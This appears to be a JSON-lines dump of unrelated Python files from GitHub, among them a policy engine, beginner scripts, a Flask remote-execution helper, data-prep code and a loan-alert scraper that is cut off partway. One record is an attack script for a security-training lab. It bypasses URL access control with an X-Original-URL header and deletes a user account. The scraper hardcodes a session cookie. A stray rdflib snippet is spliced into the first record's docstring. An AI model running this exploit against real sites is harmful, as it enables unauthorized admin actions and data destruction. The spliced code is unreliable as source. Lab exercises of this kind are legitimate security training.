ns=None,\n expand_graph=True):\n \"\"\"Check if the requested access complies with the policy.\n\n :graph: The policy graph.\n :targets: A dictionary that maps table IRIs to accessed columns.\n :assignee: The user who is requesting the access.\n :action: The action that the user wants to perform.\n :purpose: The purpose for the access.\n :ns: The dictionary of namespaces to add to the default ODRL one.\n :expand_graph: If True, introduces new hierarchical predicates on the\n IRI received as parameters (defaults to True).\n :return: A dictionary that maps table IRIs to a set of policy uids that\n 
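# Illustration of the prepare-once, bind-per-query pattern used by get_rules
# above, on a two-triple toy graph.
import rdflib
from rdflib.plugins.sparql import prepareQuery

g = rdflib.Graph()
EX = rdflib.Namespace("http://example.org/")
g.add((EX.alice, EX.likes, EX.pizza))
g.add((EX.bob, EX.likes, EX.pasta))

q = prepareQuery("SELECT ?what WHERE { ?who <http://example.org/likes> ?what }")
for row in g.query(q, initBindings={"who": EX.alice}):
    print(row[0])  # http://example.org/pizza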
grant the access, or None if the access does not comply with the\n        policy.\n    \"\"\"\n    rules = get_rules(\n        graph=graph,\n        targets=targets,\n        assignee=assignee,\n        action=action,\n        purpose=purpose,\n        pred=ODRL.permission,\n        ns=ns,\n        expand_graph=expand_graph)\n\n    # For each table, get the intersection of the permission rules, since for\n    # each table we want to find a permission rule that grants the joint\n    # visibility over all the accessed columns.\n    join_permission_rules = {\n        table_IRI: set.intersection(*rules[table_IRI].values())\n        for table_IRI in rules}\n\n    # If all the accessed tables have at least one join permission rule (the\n    # intersection is not empty), then return them, otherwise return None,\n    # to state that the access does not comply with the policy.\n    if all(join_permission_rules.values()):\n        return join_permission_rules\n    return None\n\n\ndef check_prohibition(graph, targets, assignee, action, purpose, ns=None,\n                      expand_graph=True):\n    \"\"\"Check if the requested access is explicitly forbidden by the policy.\n    This check only verifies if there is a prohibition rule that explicitly\n    denies the visibility of the requested targets to the assignee. Even\n    if the policy does not explicitly deny the access, it does not mean\n    that there is a permission rule that grants it, so it is important to\n    always check for positive permissions as well.\n\n    :graph: The policy graph.\n    :targets: A dictionary that maps table IRIs to accessed columns.\n    :assignee: The user who is requesting the access.\n    :action: The action that the user wants to perform.\n    :purpose: The purpose for the access.\n    :ns: The dictionary of namespaces to add to the default ODRL one.\n    :expand_graph: If True, introduces new hierarchical predicates on the\n        IRI received as parameters (defaults to True).\n    :return: A dictionary that maps table IRIs to a set of policy uids that\n        deny the access, or None if the access is not explicitly denied.\n    \"\"\"\n    rules = get_rules(\n        graph=graph,\n        targets=targets,\n        assignee=assignee,\n        action=action,\n        purpose=purpose,\n        pred=ODRL.prohibition,\n        ns=ns,\n        expand_graph=expand_graph)\n\n    # For each table, take the union of the prohibition rules, since a\n    # prohibition on any one of the accessed columns is enough to deny the\n    # access to the table.\n    prohibition_rules = {\n        table_IRI: set.union(*rules[table_IRI].values())\n        for table_IRI in rules}\n\n    # If any of the accessed tables has at least one prohibition rule on one\n    # of the accessed columns, return the rules that deny the access, otherwise\n    # return None, to state that the access is not explicitly denied.\n    if any(prohibition_rules.values()):\n        return prohibition_rules\n    return None\n\n\ndef check_access(graph, targets, assignee, action, purpose, ns=None,\n                 expand_graph=True):\n    \"\"\"Check if the requested access is both:\n\n    * not explicitly denied by a prohibition rule.\n    * explicitly granted by a permission rule.\n\n    :graph: The policy graph.\n    :targets: A dictionary that maps table IRIs to accessed columns.\n    :assignee: The user who is requesting the access.\n    :action: The action that the user wants to perform.\n    :purpose: The purpose for the access.\n    :ns: The dictionary of namespaces to add to the default ODRL one.\n    :expand_graph: If True, introduces new hierarchical predicates on the\n        IRI received as parameters (defaults to True).\n    :return: True if granted, False if denied (or not granted).\n    \"\"\"\n\n    print(colorama.Fore.CYAN + "\n[*] Testing access")\n    
print(\"\\tAssignee:\", assignee, sep=\"\\t\")\n print(\"\\tAction:\\t\", action, sep=\"\\t\")\n print(\"\\tTargets:\", pprint.pformat(targets), sep=\"\\t\")\n print(\"\\tPurpose:\", purpose, sep=\"\\t\")\n\n prohibitions = check_prohibition(\n graph=graph,\n targets=targets,\n assignee=assignee,\n action=action,\n purpose=purpose,\n ns=ns,\n expand_graph=expand_graph)\n\n if prohibitions:\n print(\n colorama.Fore.RED +\n f\"[*] Access prohibited by: {pprint.pformat(prohibitions)}\")\n return False\n else:\n print(colorama.Fore.YELLOW + \"Access not prohibited\")\n\n permissions = check_permission(\n graph=graph,\n targets=targets,\n assignee=assignee,\n action=action,\n purpose=purpose,\n ns=ns,\n expand_graph=expand_graph)\n\n if permissions:\n print(colorama.Fore.GREEN + \"Access permitted:\")\n for k in permissions:\n print(colorama.Fore.GREEN + \"\\ttarget:\\t\\t\" + k)\n print(colorama.Fore.GREEN +\n \"\\tperm. rules:\\t\" +\n pprint.pformat(permissions[k]))\n return True\n else:\n print(\n colorama.Fore.RED +\n f\"Access not explicitly permitted -> denied.\")\n return False\n","repo_name":"mosaicrown/policy-engine","sub_path":"mosaicrown/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17815535025","text":"import turtle\n\ndef draw_square():\n\n # Setting a window with the background colored red\n window = turtle.Screen()\n window.bgcolor('red')\n\n # Move a turtle named brad forward\n brad = turtle.Turtle()\n\n # Customize the turtle\n brad.shape(\"turtle\")\n brad.color('yellow')\n brad.speed(2)\n\n brad.forward(100)\n\n # Turn Brad right 90 degrees and move forward\n brad.right(90)\n brad.forward(100)\n\n brad.right(90)\n brad.forward(100)\n\n brad.right(90)\n brad.forward(100)\n\n window.exitonclick()\n\ndraw_square()\n","repo_name":"chukycheese/udacity_courses","sub_path":"programming_foundations_with_python/3_use_classes_draw_turtles/6_change_turtle_shape_color_and_speed.py","file_name":"6_change_turtle_shape_color_and_speed.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21993511215","text":"#! 
/usr/bin/python2\n\nfrom subprocess import *\n\nprogram_path = \"./bin/miaKU\"\ndata_path = \"../data/MIA_KU_2015_DataSet/\"\nlog_path = \"../output/\"\nnum_samples_per_image = 10000\nparams_num_trees = [10, 20, 30, 40, 50]\nparams_num_tests = [100, 150]\nparams_max_depth = [10, 11, 12, 13, 14, 15]\n\nif __name__ == \"__main__\":\n\tnum_total = len(params_num_trees) * len(params_num_tests) * len(params_max_depth)\n\tnum_processed = 0\n\tprint(\"Running %d tests...\" % (num_total))\n\tfor num_trees in params_num_trees:\n\t\tfor num_tests in params_num_tests:\n\t\t\tfor max_depth in params_max_depth:\n\t\t\t\ttry:\n\t\t\t\t\tsubproc = Popen([program_path, \"--dataset\", data_path, \"--log\", log_path, \"--use_xvalidation\", \"--enable_bagging\", \"--num_samples\", str(num_samples_per_image), \"--num_trees\", str(num_trees), \"--max_depth\", str(max_depth), \"--num_feature_tests\", str(num_tests)],\n\t\t\t\t\t\tstdout=PIPE)\n\t\t\t\t\tsubproc.communicate()\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Some error in the subprocess occurred...\") # just make sure to keep on running!\n\t\t\t\tnum_processed += 1\n\t\t\t\tprint(\"%d/%d\" % (num_processed, num_total))","repo_name":"Nalaxon/mia_randomforestclassifier","sub_path":"code/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"9232818443","text":"from flask import Flask\nfrom flask import request\nfrom flask import Response\nfrom queue import Queue\nimport signal\nimport time\nimport importlib\nimport base64\nimport sys\nimport traceback\nimport pickle\nimport threading\nimport os\n\nimport threading\nimport inspect\nimport ctypes\n\napp = Flask(__name__)\n\nRUNNING_THREAD = None\n\nclass RedirectOutput(object):\n    encoding = 'UTF-8'\n    def __init__(self, stream, name):\n        self.stream = stream\n        self.name = name\n        self.buffer = None\n        self._wrapped = False\n    def write(self, data):\n        self.stream.put(pickle.dumps([self.name, data]))\n    def writelines(self, datas):\n        self.stream.put(pickle.dumps([self.name, datas]))\n    def flush(self):\n        pass\n    def __getattr__(self, attr):\n        raise\n        return getattr(self.stream, attr)\n\n    \nclass KillableThread(threading.Thread):\n    def kill(self):\n        # To be honest I don't actually understand why this works.\n        # I'm not sure if it's even supposed to or just happens to...\n        # So not \"you are not supposed to understand this\"\n        # But also I guess \"I am not supposed to understand this\"?\n        if not self.is_alive():\n            return\n        \n        for tid, tobj in threading._active.items():\n            if tobj is self:\n                break\n        else:\n            raise Exception(\"There's no active thread.\")\n        tid = ctypes.c_long(tid)\n        \n        res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid,\n                                                         ctypes.py_object(SystemExit))\n        if res == 0:\n            raise Exception(\"Invalid thread.\")\n        elif res == 1:\n            pass # Everything's great\n        else:\n            ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\n            raise Exception(\"Something went very wrong when killing a thread.\")\n\n\ndef do_it__I_AM_BACKGROUND_DONT_RELOAD(path, name, which, args, result):\n    path = base64.b64decode(path.replace(\"_\",\"/\")).decode('ascii')\n    name = base64.b64decode(name.replace(\"_\",\"/\")).decode('ascii')\n    which = base64.b64decode(which.replace(\"_\",\"/\")).decode('ascii')\n    args, kwargs = pickle.loads(base64.b64decode(args.replace(\"_\",\"/\")))\n    fout = RedirectOutput(result, 'stdout')\n    ferr = RedirectOutput(result, 'stderr')\n    stdout, stderr = sys.stdout, sys.stderr\n    sys.stdout, sys.stderr = fout, ferr\n    res = None\n    try:\n        if path not in sys.path:\n            sys.path.append(path)\n        os.chdir(path)\n        if name not in sys.modules:\n            module = __import__(name)\n        else:\n            module = __import__(name)\n            importlib.reload(module)\n        if which != '__DONOTHING__':\n            # When we are running a script top-down, then we pass this donothing.\n            res = getattr(module, which)(*args, **kwargs)\n        result.put(pickle.dumps([\"result\", res]))\n    except Exception as err:\n        exc = traceback.format_exc()\n        result.put(pickle.dumps([\"traceback\", exc]))\n    finally:\n        sys.stdout, sys.stderr = stdout, stderr\n\n    \n@app.route(\"/do/\", methods=['POST'])\ndef do():\n    global RUNNING_THREAD\n\n    path = request.form['module_name']\n    name = request.form['file_name']\n    function = request.form['function_name']\n    args = request.form['arguments']\n    \n    if RUNNING_THREAD is not None:\n        print(\"ERROR!! Tried to start a job when a prior job is still running. Cowardly refusing.\")\n        return \"NACK\"\n\n    result = Queue()\n    RUNNING_THREAD = KillableThread(target=do_it__I_AM_BACKGROUND_DONT_RELOAD, args=[path, name, function, args, result])\n    RUNNING_THREAD.start()\n\n    def generate():\n        global RUNNING_THREAD\n        # race condition here\n        while RUNNING_THREAD and RUNNING_THREAD.is_alive():\n            while not result.empty():\n                top = result.get()\n                yield base64.b64encode(top)+b\"\\n\"\n            time.sleep(.1)\n        # check once more for data... 'cause we waited I guess it's safe?\n        while not result.empty():\n            top = result.get()\n            yield base64.b64encode(top)+b\"\\n\"\n        RUNNING_THREAD = None\n\n    return Response(generate())\n\n@app.route(\"/kill\", methods=['GET'])\ndef kill():\n    global RUNNING_THREAD\n    if RUNNING_THREAD is not None:\n        RUNNING_THREAD.kill()\n        RUNNING_THREAD = None\n    return \"ok\"\n\n@app.route(\"/status\", methods=['GET'])\ndef status():\n    return \"alive\"\n\n\ndef handler(signum, frame):\n    exit(1)\n    \n    \nsignal.signal(signal.SIGINT, handler) \n\nif __name__ == \"__main__\":\n    app.run(threaded=True, port=19568)\n","repo_name":"carlini/pycallcc","sub_path":"pycallcc/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} {"seq_id":"12472323572","text":"menu='''\nSelect an operation to perform on two numbers\n\n\"+\" to add\n\"-\" to subtract\n\"*\" to multiply\n\"/\" to divide\n\"q\" to quit\n\nPlease enter your choice :'''\n\nchoices=[\"+\",\"-\",\"*\",\"/\",\"q\"]\ncalc=input(menu).lower()\n\nwhile (calc!=\"q\"):\n    if calc in choices:\n        a=int(input(\"Enter no.1 : \"))\n        b=int(input(\"Enter no.2 : \"))\n        if calc==\"+\":\n            sum=a+b\n            print(f\" The sum : {sum}\")\n        elif calc==\"-\":\n            diff=a-b\n            print(f\"The difference : {diff}\")\n        elif calc==\"*\":\n            mul=a*b\n            print(f\"The product : {mul}\")\n        elif calc==\"/\":\n            divs=a/b\n            print(f\"The division : {divs}\")\n    else:\n        print(\"\\nInvalid option\")\n\n    calc=input(menu).lower()\n    \n","repo_name":"Access7-s/Python-Exercise","sub_path":"Python exercises Beginners/calcuntilq.py","file_name":"calcuntilq.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"4898171278","text":"from flask import Flask, jsonify\nfrom flask_cors import CORS\n\nimport librosa\n\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/\")\ndef home():\n    return \"Home\"\n\n\n@app.route(\"/nutcracker\")\ndef nutcracker():\n    filename = librosa.example('nutcracker')\n    y, sr = librosa.load(filename)\n    tempo, beat_frames = librosa.beat.beat_track(y=y, sr=sr)\n    response = {\n        'title': 'Nutcracker',\n        'tempo': tempo,\n        'key': 'C Major'\n    }\n    return jsonify(response)\n\n\n@app.route(\"/sweetwaltz\")\ndef sweetwaltz():\n    filename = librosa.example('sweetwaltz')\n    y, sr = librosa.load(filename)\n    tempo, beat_frames = librosa.beat.beat_track(y=y, sr=sr)\n    response = {\n        'title': 'Sweet Waltz',\n        'tempo': tempo,\n        'key': 'C Major'\n    }\n    return jsonify(response)\n\n\n@app.route(\"/fishin\")\ndef fishin():\n    filename = librosa.example('fishin')\n    y, sr = librosa.load(filename)\n    tempo, beat_frames = librosa.beat.beat_track(y=y, sr=sr)\n    response = {\n        'title': 'Fishin',\n        'tempo': tempo,\n        'key': 'C Major'\n    }\n    return jsonify(response)\n","repo_name":"arvindeva/api-project-backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"8810700891","text":"# URL-based access control can be circumvented\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\nfrom bs4 import BeautifulSoup\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef find_admin_panel(s, url):\n\tprint('\\n[+] Searching admin panel adding X-Original-URL header...')\n\theaders = {'X-Original-URL': '/admin'}\n\tr = s.get(url, headers=headers)\n\ttime.sleep(1)\n\tif r.status_code == 200 and '/admin/delete?username=' in r.text:\n\t\tprint('[+] Found admin panel !\\n')\n\treturn r\n\ndef delete_carlos(s, url):\n\tprint('[+] Trying to delete Carlos user adding X-Original-URL header...')\n\tdelete_headers = {'X-Original-URL': '/admin/delete'}\n\tdelete_path = url + '/?username=carlos'\n\tr = s.get(delete_path, headers=delete_headers)\n\ttime.sleep(1)\n\tprint('[+] Checking that Carlos user has been removed...')\n\tr = find_admin_panel(s, url)\n\tif 'carlos' not in r.text:\n\t\tprint('[+] Successfully removed Carlos user !')\n\telse:\n\t\tprint('[-] Exploit failed to remove Carlos user !!!')\n\t\tsys.exit(1)\n\ndef show_usage():\n\tprint('[+] Usage: %s <url>' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: URL-based access control can be circumvented')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif 'Error' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to find unprotected admin panel...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\ttime.sleep(2)\n\t\t\tr = find_admin_panel(s, url)\n\t\t\tr = delete_carlos(s, url)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be misconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"gwyomarch/WebSecurityAcademy","sub_path":"AccessControl/exploit-lab10.py","file_name":"exploit-lab10.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"74232510889","text":"import random\n\nlist_a = []\n\nfor i in range(4) :\n    list_a.append(random.randint(1,100))\n\nlist_a.sort()\n\nprint(list_a)\n\n#########\n\nans = random.randint(1,10)\n\nwhile(1) :\n    choice = int(input(\"숫자를 맞춰\"))\n\n    if choice == ans :\n        print(\"정답\")\n        break\n    else:\n        print(\"땡\")\n\n#############\n\nlotto = random.sample(range(45), 6)\n\nprint(lotto)","repo_name":"Kminseokk/sf3_10_python","sub_path":"day231110/study07.py","file_name":"study07.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"21073832542","text":"import pandas as pd\nimport namen_prep\nimport streamlit as st\n\ndef drop_niet_blokken(df):\n    '''Unit is a combination of 4 digits when it refers to an umbrella term.\n    By keeping only the rows where Unit is longer than 4 characters,\n    we keep only the rows about blocks.'''\n    dataf = df.copy()\n    return dataf.loc[dataf.Unit.str.len() > 4, ]\n\n@st.cache(suppress_st_warning=True)\ndef prep_onderwijs_data():\n    files = ['Data/BROS HSR realisations 2019-2020, 14.5.2022-Blokcoordinatoren en planningsgroepsleden.xlsx',\n             'Data/BROS HSR realisations 2020-2021, 11.2.2022-Blokcoordinatoren en planningsgroepsleden.xlsx',\n             'Data/BROS HSR realisations 2021-2022, 14.5.2022-Blokcoordinatoren en planningsgroepsleden.xlsx']\n\n    onderwijs = pd.DataFrame()\n\n    # put all years into one df\n    for jaar, filename in zip(range(2019, 2022), files):\n        onderwijs = pd.concat([onderwijs, (pd.read_excel(filename,\n                                                         sheet_name='Realisations')\n                                           .dropna(subset=['Unit'])\n                                           .assign(Year=jaar)\n                                           .pipe(drop_niet_blokken)\n                                           .drop_duplicates())],\n                              axis=0)\n    \n    onderwijs['UnitYear'] = [f\"{unit}_{year}\" for unit, year in zip(onderwijs['Unit'], onderwijs['Year'])]\n    onderwijs['Prefix'] = onderwijs['Prefix'].fillna('')\n    onderwijs['Naam'] = (onderwijs.Initials + \" \" + onderwijs.Prefix + \" \" + onderwijs.Name).str.replace(\"  \", \" \").str.replace(\"  \", \" \")\n\n    # select permanent staff only\n    onderwijs['is_vaste_staf'] = onderwijs.Name.apply(namen_prep.check_if_vaste_staf_achternaam)\n    onderwijs = onderwijs.loc[onderwijs.is_vaste_staf, ]\n\n    # make sure names are written the same way as in Pure/Onderzoek\n    missing_before = onderwijs['Naam'].isnull().sum()\n    onderwijs['Naam'] = [namen_prep.onderwijsnaam_naar_onderzoeksnaam(naam) for naam in onderwijs['Naam'].values]\n    missing_after = onderwijs['Naam'].isnull().sum()\n    assert missing_before == missing_after\n\n    return onderwijs\n\n\n@st.cache(suppress_st_warning=True)\ndef prep_supervisie_data():\n\n    sv1 = pd.read_excel('Data/Promovendi HSR 20220602.xlsx', sheet_name='PhD programme')\n    sv2 = (pd.read_excel('Data/HSR promoties 01012021 tot 01072022.xlsx', sheet_name='PhD programme')\n           .drop(['PhD defense date', 'Duration from PhD starting date until PhD defense date'], axis=1))\n\n    assert (sv1.columns.values == sv2.columns.values).all()\n\n    # combine current PhDs and PhDs who graduated in the past year\n    sv = pd.concat([sv1, sv2], axis=0)\n\n    # create dummy columns for the 4 supervisors and link them to the PhD name\n    supervisor_df = sv['Assigned supervisors'].str.split(',', expand=True)\n    ties_prep = pd.concat([sv['Full name'], supervisor_df], axis=1)\n\n    # from wide to long (with columns PhD name and Name (of the supervisor))\n    ties_long = (pd.melt(ties_prep, id_vars='Full name',\n                         value_vars=supervisor_df.columns,\n                         var_name='supervisor_nr',\n                         value_name='Name')\n                 .sort_values('Full name')\n                 .rename(columns={'Full name': 'PhD name'})\n                 .drop('supervisor_nr', axis=1)\n                 .dropna())\n\n    # select only rows with permanent staff members\n    ties_long['achternaam'] = ties_long['Name'].str.split().str[-1]\n    ties_long['is_vaste_staf'] = ties_long['achternaam'].apply(namen_prep.check_if_vaste_staf_achternaam)\n    ties_long = ties_long.loc[ties_long.is_vaste_staf, ]\n\n    # all PhDs with only 1 permanent HSR staff supervisor can be dropped, since there is no 'collaboration' there\n    # to do this, join the value counts of the PhD name (at this point the long data only contains rows with permanent staff supervisors)\n    vc = ties_long['PhD name'].value_counts().to_frame('nr_of_HSR_supervisors')\n    vc.index.name='PhD name'\n    ties = ties_long.merge(vc, on='PhD name', how='left')\n    ties = ties[ties['nr_of_HSR_supervisors'] > 1]\n\n    # make sure names are written the same way as in Pure/Onderzoek\n    ties['Name'] = ties['Name'].str.replace('.', '').str.strip()\n    missing_before = ties['Name'].isnull().sum()\n    ties['Name'] = [namen_prep.supervisornaam_naar_onderzoeksnaam(naam) for naam in ties['Name'].values]\n    missing_after = ties['Name'].isnull().sum()\n    assert missing_before == missing_after\n\n    return ties","repo_name":"NHameleers/heidag_netwerken","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"4238661175","text":"import datetime\nimport json\n\nimport environment\nimport requests\nimport scheduler\nimport cacheing\nimport creds_parser\nimport os\nimport global_vars\n\nharmoney_email = harmoney_pwd = \"\"\n\n# ALG_VARS\nperiod = 10.0 # Called every 10 seconds\nseen_loan_ids = []\n\n# CACHE STORAGE\nrel_path = \"./cache/nz_harmoney.txt\"\nservice_name = \"Harmoney\"\n\n\ndef send_auth_req():\n    sign_in_url = \"https://app.harmoney.com/accounts/sign_in\"\n    sign_in_payload = \"{\\n \\\"branch\\\": \\\"NZ\\\",\\n \\\"account\\\": {\\n \\\"email\\\": \\\"\" + harmoney_email + \"\\\",\\n \\\"password\\\": \\\"\" + harmoney_pwd + \"\\\"\\n\\t}\\n}\"\n    sign_in_headers = {\n        'cookie': 
\"_harmoney_session_id=SXB5MWh3VTZZdVVHZXVoT0FxKzI1WHRwRE8yVnk4QkVDbDhMTEJoUGFlZFJCeDhOdWlCVHFzZ2VReU1SQVFHTFYzdU0rc2lvdG1OVFBHZnRieWZPUWtFRUMrM3pqVEg1N3dPWkRUSTNMMFlWZi9yL0tQcDUyMXEzbWl0Yk5BWTIyMTlzanpYRGk2S3h3bmtybFJuMGNFVEdvRWkzV0VwSy9rWk9WdEllOHZMYjVWZmlkbUtPbFBERkhnTFNqbWRqV21WZy95MlAvbUdUWHZTRHlzalNGalFRQjhyWlhtTmlZUFlPOVZFZ20vUm4rUnBGNHFYYzVYK2xoamZXMk5VV2g3NmlpdU85cTAyZnN0TFRNWU1FUmZYaHV5Y1NZdWZsazZYR3UzZVBSc1ZxdG5TR2gwVldMUU1jV3FkZ0pzNlJqNFNBd1c2UjFVaDIrbmJMd0xEQmxUdWw3MUhaamozVnBrVnF4eFhoQ2YxRE5wWjJzQm1GekY1Q0lIbWt1RktKZTJYcXo3bUtnV2tHOXJhNmF3a3N6MTc1ZHFCN0FSanJqQTgwb3RMWWNsVUlSWkZLaDBuM3A0M1dWOTNUajVTN2tIeUsxWmNQc0VoV3JnczgyRUg2U0NQUHA2NlVvcnV4ZjNWQkRKUTRDdStaYTY0dmhGTTFVcUxOdm9LekNKZ0VDcVZYb091aTRkaFdwaUpkZlRjTGV4UU5OaEwxS3UrL05XR2t6TSt1dVUwPS0tWmEyRW5pLzhYVXh5MWZ1aDM1Q2cvQT09--dc79b054f8453fcc20e22a6263d276ebb3a56790\",\n 'user-agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/72.0.3626.121 Safari/537.36\",\n 'referer': \"https://www.harmoney.co.nz/sign-in\",\n 'origin': \"https://www.harmoney.co.nz\",\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n return requests.request(\"POST\", sign_in_url, data=sign_in_payload, headers=sign_in_headers)\n\n\ndef send_loan_query(cookie):\n # GET LOANS\n get_loans_url = \"https://app.harmoney.com/api/v1/investor/marketplace/loans\"\n get_loans_querystring = {\"limit\": \"100\", \"offset\": \"0\"}\n headers = {\n 'pragma': \"no-cache\",\n 'host': \"app.harmoney.com\",\n 'dnt': \"1\",\n 'connection': \"keep-alive\",\n 'cache-control': \"no-cache\",\n 'accept-encoding': \"gzip, deflate, br\",\n 'accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n 'user-agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/72.0.3626.121 Safari/537.36\",\n 'content-type': \"'application/x-www-form-urlencoded'\"\n }\n return requests.request(\"GET\", get_loans_url, cookies=cookie, headers=headers, params=get_loans_querystring)\n\n\ndef build_email_body(loan_details):\n email_body = \"\" \\\n \"
<html><body>Hello,<br><br>\" \\\n                 \"A new loan has just been listed, please sign in and review the loan if you're interested in \" \\\n                 \"investing.<br><br>\" \\\n                 \"Go to https://www.harmoney.co.nz to log-in and view the new loan<br><br>\"\n\n    # NOTE: the HTML tags in the strings of this function are a reconstruction;\n    # the original markup was lost during text extraction.\n    email_body += \"Loan Details:<br><br>\"\n\n    for loan_info in loan_details:\n        email_body += \\\n            \"Loan Grade: \" + loan_info['grade'] + \"<br>\" \\\n            \"Interest Rate: \" + str(\n                loan_info['interest_rate']) + \"%<br>\" \\\n            \"Loan Amount : $\" + str(loan_info['loan_amount']) + \"<br>\" \\\n            \"Percentage Funded: \" + str(\n                loan_info['percentage_funded']) + \"%<br>\" \\\n            \"Term Length: \" + str(loan_info['term_length']) + \"<br>\" \\\n            \"Purpose: \" + \\\n            loan_info['purpose'] + \"<br><br>\"\n\n    email_body += \"Regards,<br>\"\n    email_body += \"Chris Connolly<br>\"\n    email_body += \"</body></html>\"\n\n    return email_body\n\n\ndef send_email(loan_details):\n    email_body = build_email_body(loan_details)\n    who_from, who_to, subject = environment.get_mail_metadata_from_platform_name(service_name)\n    print(who_from, who_to, subject)\n    try:\n        r = requests.post(\n            \"https://api.mailgun.net/v3/p2pnotifications.live/messages\",\n            auth=(\"api\", os.getenv(\"MG_API_KEY\")),\n            data={\n                \"from\": who_from,\n                \"to\": who_to,\n                \"subject\": subject,\n                \"html\": email_body\n            }\n        )\n        r.raise_for_status()\n\n    except requests.exceptions.HTTPError as errh:\n        print(\"Http Error:\", errh)\n        global_vars.bugsnag_conf.notify(errh)\n    except requests.exceptions.ConnectionError as errc:\n        print(\"Error Connecting:\", errc)\n        global_vars.bugsnag_conf.notify(errc)\n    except requests.exceptions.Timeout as errt:\n        print(\"Timeout Error:\", errt)\n        global_vars.bugsnag_conf.notify(errt)\n    except requests.exceptions.RequestException as err:\n        print(\"Oops: Something Else\", err)\n        global_vars.bugsnag_conf.notify(err)\n\n# If the ID of a stored loan doesn't exist in a response,\n# we can assume it's been filled and can remove it.\ndef remove_old_loans(response):\n    global seen_loan_ids\n    loans_after_removal = []\n\n    for stored_loan_id in seen_loan_ids:\n        in_response = False\n        for loan_from_req in response['items']:\n            if stored_loan_id == loan_from_req['id']:\n                in_response = True\n                break\n\n        if in_response:\n            loans_after_removal.append(stored_loan_id)\n\n    seen_loan_ids = loans_after_removal\n\n\n# TASK TO RETRIEVE NEW LOANS RUN EVERY MINUTE\ndef get_loans():\n    response = send_auth_req()\n    c = response.cookies # RETRIEVE COOKIE INSIDE RESPONSE\n\n    # USE COOKIE RESPONSE IN NEW REQUEST AS TOKEN\n    response = send_loan_query(c)\n    json_resp = json.loads(response.text)\n\n    return json_resp\n\n\ndef get_new_loans(response):\n    global seen_loan_ids\n    # Have we seen it before?\n    new_loan_avail = False\n    new_loan_details = []\n    for loan in response['items']:\n        if loan['id'] not in seen_loan_ids:\n            seen_loan_ids.append(loan['id'])\n            loan_info = {\n                'grade': loan['grade'],\n                'interest_rate': loan['interest_rate'],\n                'loan_amount': loan['amount'],\n                'term_length': str(loan['term']) + \" months\",\n                'purpose': loan['loan_purpose'],\n                'percentage_funded': round(float(loan['amount_funded']) / float(loan['amount']) * 100, 2)\n            }\n            new_loan_details.append(loan_info)\n            new_loan_avail = True\n\n    return new_loan_avail, new_loan_details\n\n\ndef job():\n    print(\"Running\", service_name, \"Job. Current DateTime:\", datetime.datetime.today())\n\n    response = get_loans()\n    loan_available = response['total_count'] != 0\n    